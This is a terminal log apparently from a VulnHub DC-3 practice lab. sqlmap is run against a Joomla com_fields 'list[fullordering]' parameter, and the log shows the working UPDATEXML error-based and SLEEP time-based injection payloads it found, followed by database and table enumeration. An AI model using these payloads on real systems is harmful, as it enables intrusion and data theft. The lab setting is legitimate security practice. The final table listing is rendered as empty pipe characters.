1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390
| ┌──(kali㉿kali)-[~/vulnhub/DC/3/workSpace] └─$ sudo sqlmap -u "http://192.168.56.111/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] ___ __H__ ___ ___[(]_____ ___ ___ {1.7.2 |_ -| . [(] | .'| . | |___|_ [.]_|_|_|__,| _| |_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:08:09 /2023-05-31/
[15:08:09] [INFO] fetched random HTTP User-Agent header value 'Opera/9.10 (X11; Linux i386; U; en)' from file '/usr/share/sqlmap/data/txt/user-agents.txt' [15:08:10] [INFO] testing connection to the target URL [15:08:10] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests you have not declared cookie(s), while server wants to set its own ('460ada11b31d3c5e5ca6e58fd5d3de27=onljp83m4d8...cvdtmls307'). Do you want to use those [Y/n] [15:08:16] [INFO] checking if the target is protected by some kind of WAF/IPS [15:08:16] [INFO] testing if the target URL content is stable [15:08:16] [INFO] target URL content is stable [15:08:16] [INFO] heuristic (basic) test shows that GET parameter 'list[fullordering]' might be injectable (possible DBMS: 'MySQL') [15:08:16] [INFO] testing for SQL injection on GET parameter 'list[fullordering]' it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] [15:08:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [15:08:18] [WARNING] reflective value(s) found and filtering out [15:08:21] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause' [15:08:23] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)' [15:08:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)' [15:08:27] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (subquery - comment)' [15:08:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)' [15:08:30] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (comment)' [15:08:31] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - comment)' [15:08:32] [INFO] testing 'Boolean-based blind - Parameter replace (original value)' [15:08:32] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)' [15:08:32] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)' [15:08:33] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)' [15:08:33] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)' [15:08:33] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause' [15:08:35] [INFO] testing 'Generic inline queries' [15:08:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)' [15:08:36] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' [15:08:37] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' [15:08:38] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' [15:08:40] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)' [15:08:42] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)' [15:08:44] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)' [15:08:46] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)' [15:08:48] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)' [15:08:50] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)' [15:08:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)' [15:08:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)' [15:08:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)' [15:08:52] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)' [15:08:52] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)' [15:08:52] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)' [15:08:52] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause' [15:08:52] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)' [15:08:52] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause' [15:08:52] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)' [15:08:52] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries' [15:08:53] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries' [15:08:53] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' [15:08:55] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)' [15:08:56] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)' [15:08:57] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)' [15:08:59] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' [15:09:00] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)' [15:09:01] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)' [15:09:03] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)' [15:09:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [15:09:06] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [15:09:07] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' [15:09:09] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' [15:09:10] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)' [15:09:12] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)' [15:09:13] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [15:09:14] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)' [15:09:16] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)' [15:09:16] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)' [15:09:17] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)' [15:09:17] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)' [15:09:17] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)' [15:09:17] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)' [15:09:17] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)' [15:09:17] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)' [15:09:17] [INFO] GET parameter 'list[fullordering]' is 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)' injectable [15:09:17] [INFO] testing 'MySQL inline queries' [15:09:18] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)' [15:09:18] [INFO] testing 'MySQL >= 5.0.12 stacked queries' [15:09:18] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)' [15:09:18] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)' [15:09:18] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)' [15:09:18] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)' [15:09:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [15:09:18] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)' [15:09:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)' [15:09:18] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)' [15:09:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)' [15:09:18] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)' [15:09:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)' [15:09:18] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)' [15:09:18] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)' [15:09:18] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)' [15:09:18] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK)' [15:09:18] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query)' [15:09:18] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK - comment)' [15:09:18] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query - comment)' [15:09:18] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment)' [15:09:18] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query - comment)' [15:09:18] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind' [15:09:18] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)' [15:09:18] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)' [15:09:18] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)' [15:09:18] [INFO] testing 'MySQL AND time-based blind (ELT)' [15:09:18] [INFO] testing 'MySQL OR time-based blind (ELT)' [15:09:18] [INFO] testing 'MySQL AND time-based blind (ELT - comment)' [15:09:18] [INFO] testing 'MySQL OR time-based blind (ELT - comment)' [15:09:18] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)' [15:09:18] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)' [15:09:18] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace' [15:09:18] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)' [15:09:29] [INFO] GET parameter 'list[fullordering]' appears to be 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)' injectable [15:09:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [15:09:29] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [15:09:29] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns' [15:09:30] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns' [15:09:30] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns' [15:09:31] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns' [15:09:31] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns' [15:09:32] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns' [15:09:32] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns' [15:09:33] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns' [15:09:33] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns' [15:09:34] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' [15:09:34] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns' [15:09:35] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns' [15:09:35] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns' [15:09:36] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns' [15:09:36] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns' [15:09:37] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns' [15:09:38] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns' [15:09:38] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns' [15:09:39] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns' GET parameter 'list[fullordering]' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 2716 HTTP(s) requests: --- Parameter: list[fullordering] (GET) Type: error-based Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML) Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(8824,CONCAT(0x2e,0x717a627071,(SELECT (ELT(8824=8824,1))),0x716a7a6b71),6230))
Type: time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction) Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 8632 FROM (SELECT(SLEEP(5)))WmsI) --- [15:09:51] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 16.10 or 16.04 (xenial or yakkety) web application technology: Apache 2.4.18 back-end DBMS: MySQL >= 5.1 [15:09:51] [INFO] fetching database names [15:09:51] [INFO] retrieved: 'information_schema' [15:09:51] [INFO] retrieved: 'joomladb' [15:09:51] [INFO] retrieved: 'mysql' [15:09:51] [INFO] retrieved: 'performance_schema' [15:09:51] [INFO] retrieved: 'sys' available databases [5]: [*] information_schema [*] joomladb [*] mysql [*] performance_schema [*] sys
[15:09:51] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 2675 times [15:09:51] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.111'
[*] ending @ 15:09:51 /2023-05-31/
┌──(kali㉿kali)-[~/vulnhub/DC/3/workSpace] └─$ sudo sqlmap -u "http://192.168.56.111/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --random-agent -D joomladb --tables ___ __H__ ___ ___[(]_____ ___ ___ {1.7.2 |_ -| . [.] | .'| . | |___|_ [,]_|_|_|__,| _| |_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:10:42 /2023-05-31/
[15:10:42] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.43 Safari/525.19' from file '/usr/share/sqlmap/data/txt/user-agents.txt' [15:10:42] [INFO] resuming back-end DBMS 'mysql' [15:10:42] [INFO] testing connection to the target URL [15:10:42] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests you have not declared cookie(s), while server wants to set its own ('460ada11b31d3c5e5ca6e58fd5d3de27=gdur4j5rk68...ce25ghi8c2'). Do you want to use those [Y/n] sqlmap resumed the following injection point(s) from stored session: --- Parameter: list[fullordering] (GET) Type: error-based Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML) Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(8824,CONCAT(0x2e,0x717a627071,(SELECT (ELT(8824=8824,1))),0x716a7a6b71),6230))
Type: time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction) Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 8632 FROM (SELECT(SLEEP(5)))WmsI) --- [15:10:44] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial) web application technology: Apache 2.4.18 back-end DBMS: MySQL >= 5.1 [15:10:44] [INFO] fetching tables for database: 'joomladb' [15:10:44] [INFO] retrieved: '#__assets' [15:10:45] [INFO] retrieved: '#__associations' [15:10:45] [INFO] retrieved: '#__banner_clients' [15:10:45] [INFO] retrieved: '#__banner_tracks' [15:10:45] [INFO] retrieved: '#__banners' [15:10:45] [INFO] retrieved: '#__bsms_admin' [15:10:45] [INFO] retrieved: '#__bsms_books' [15:10:45] [INFO] retrieved: '#__bsms_comments' [15:10:45] [INFO] retrieved: '#__bsms_locations' [15:10:45] [INFO] retrieved: '#__bsms_mediafiles' [15:10:45] [INFO] retrieved: '#__bsms_message_typ' [15:10:45] [INFO] retrieved: '#__bsms_podcast' [15:10:45] [INFO] retrieved: '#__bsms_series' [15:10:45] [INFO] retrieved: '#__bsms_servers' [15:10:45] [INFO] retrieved: '#__bsms_studies' [15:10:45] [INFO] retrieved: '#__bsms_studytopics' [15:10:45] [INFO] retrieved: '#__bsms_teachers' [15:10:45] [INFO] retrieved: '#__bsms_templatecod' [15:10:45] [INFO] retrieved: '#__bsms_templates' [15:10:45] [INFO] retrieved: '#__bsms_timeset' [15:10:45] [INFO] retrieved: '#__bsms_topics' [15:10:45] [INFO] retrieved: '#__bsms_update' [15:10:45] [INFO] retrieved: '#__categories' [15:10:45] [INFO] retrieved: '#__contact_details' [15:10:45] [INFO] retrieved: '#__content' [15:10:45] [INFO] retrieved: '#__content_frontpag' [15:10:45] [INFO] retrieved: '#__content_rating' [15:10:45] [INFO] retrieved: '#__content_types' [15:10:45] [INFO] retrieved: '#__contentitem_tag_' [15:10:45] [INFO] retrieved: '#__core_log_searche' [15:10:45] [INFO] retrieved: '#__extensions' [15:10:46] [INFO] retrieved: '#__fields' [15:10:46] [INFO] retrieved: '#__fields_categorie' [15:10:46] [INFO] retrieved: '#__fields_groups' [15:10:46] [INFO] retrieved: '#__fields_values' [15:10:46] [INFO] retrieved: '#__finder_filters' [15:10:46] [INFO] retrieved: '#__finder_links' [15:10:46] [INFO] retrieved: '#__finder_links_ter' [15:10:46] [INFO] retrieved: '#__finder_links_ter' [15:10:46] [INFO] retrieved: '#__finder_links_ter' [15:10:46] [INFO] retrieved: '#__finder_links_ter' [15:10:46] [INFO] retrieved: '#__finder_links_ter' [15:10:46] [INFO] retrieved: '#__finder_links_ter' [15:10:46] [INFO] retrieved: '#__finder_links_ter' [15:10:46] [INFO] retrieved: '#__finder_links_ter' [15:10:46] [INFO] retrieved: '#__finder_links_ter' [15:10:46] [INFO] retrieved: '#__finder_links_ter' [15:10:46] [INFO] retrieved: '#__finder_links_ter' [15:10:46] [INFO] retrieved: '#__finder_links_ter' [15:10:46] [INFO] retrieved: '#__finder_links_ter' [15:10:46] [INFO] retrieved: '#__finder_links_ter' [15:10:46] [INFO] retrieved: '#__finder_links_ter' [15:10:46] [INFO] retrieved: '#__finder_links_ter' [15:10:46] [INFO] retrieved: '#__finder_taxonomy' [15:10:46] [INFO] retrieved: '#__finder_taxonomy_' [15:10:46] [INFO] retrieved: '#__finder_terms' [15:10:46] [INFO] retrieved: '#__finder_terms_com' [15:10:46] [INFO] retrieved: '#__finder_tokens' [15:10:46] [INFO] retrieved: '#__finder_tokens_ag' [15:10:46] [INFO] retrieved: '#__finder_types' [15:10:46] [INFO] retrieved: '#__jbsbackup_timese' [15:10:46] [INFO] retrieved: '#__jbspodcast_times' [15:10:46] [INFO] retrieved: '#__languages' [15:10:46] [INFO] retrieved: '#__menu' [15:10:46] [INFO] retrieved: '#__menu_types' [15:10:47] [INFO] retrieved: '#__messages' [15:10:47] [INFO] retrieved: '#__messages_cfg' [15:10:47] [INFO] retrieved: '#__modules' [15:10:47] [INFO] retrieved: '#__modules_menu' [15:10:47] [INFO] retrieved: '#__newsfeeds' [15:10:47] [INFO] retrieved: '#__overrider' [15:10:47] [INFO] retrieved: '#__postinstall_mess' [15:10:47] [INFO] retrieved: '#__redirect_links' [15:10:47] [INFO] retrieved: '#__schemas' [15:10:47] [INFO] retrieved: '#__session' [15:10:47] [INFO] retrieved: '#__tags' [15:10:47] [INFO] retrieved: '#__template_styles' [15:10:47] [INFO] retrieved: '#__ucm_base' [15:10:47] [INFO] retrieved: '#__ucm_content' [15:10:47] [INFO] retrieved: '#__ucm_history' [15:10:47] [INFO] retrieved: '#__update_sites' [15:10:47] [INFO] retrieved: '#__update_sites_ext' [15:10:47] [INFO] retrieved: '#__updates' [15:10:47] [INFO] retrieved: '#__user_keys' [15:10:47] [INFO] retrieved: '#__user_notes' [15:10:47] [INFO] retrieved: '#__user_profiles' [15:10:47] [INFO] retrieved: '#__user_usergroup_m' [15:10:47] [INFO] retrieved: '#__usergroups' [15:10:47] [INFO] retrieved: '#__users' [15:10:47] [INFO] retrieved: '#__utf8_conversion' [15:10:47] [INFO] retrieved: '#__viewlevels' Database: joomladb [76 tables] +---------------------+ | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | +---------------------+
[15:10:47] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 93 times [15:10:47] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.111'
[*] ending @ 15:10:47 /2023-05-31/
|